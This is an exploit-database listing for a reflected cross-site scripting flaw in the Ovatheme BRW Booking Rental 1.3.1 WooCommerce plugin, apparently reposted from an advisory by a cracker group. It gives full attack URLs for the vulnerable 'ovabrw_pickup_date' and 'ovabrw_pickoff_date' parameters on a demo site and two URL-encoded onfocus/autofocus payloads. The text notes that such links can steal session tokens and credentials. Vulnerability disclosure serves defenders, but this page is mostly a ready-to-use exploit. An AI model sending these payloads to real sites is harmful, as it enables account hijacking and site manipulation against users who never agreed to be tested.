Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-24363 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2022-10-01 |
C r a C k E r T H E C R A C K O F E T E R N A L M I G H T From The Ashes and Dust Rises An Unimaginable crack.... [ Exploits ] : Author : CraCkEr : Website : Ovatheme.com Vendor : Ovatheme Software : BRW - Booking Rental 1.3.1 Plugin WooCommerce Vuln Type: Reflected XSS Method : GET Impact : Manipulate the content of the site B4nks-NET irc.b4nks.tk #unix : : Release Notes: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob CraCkEr 2022 GET parameter 'ovabrw_pickup_date' is vulnerable to XSS https://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=[XSS]&ovabrw_pickoff_date=&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=product GET parameter 'ovabrw_pickoff_date' is vulnerable to XSS https://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=&ovabrw_pickoff_date=[XSS]&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=product Some XSS Payloads Reflected bbb4l%22%20onfocus%3dalert(1)%20autofocus%3d%20q9s9y ne503%22%20onfocus%3dalert(1)%20autofocus%3d%20sg1gu [-] Done
Copyright ©2024 Exploitalert.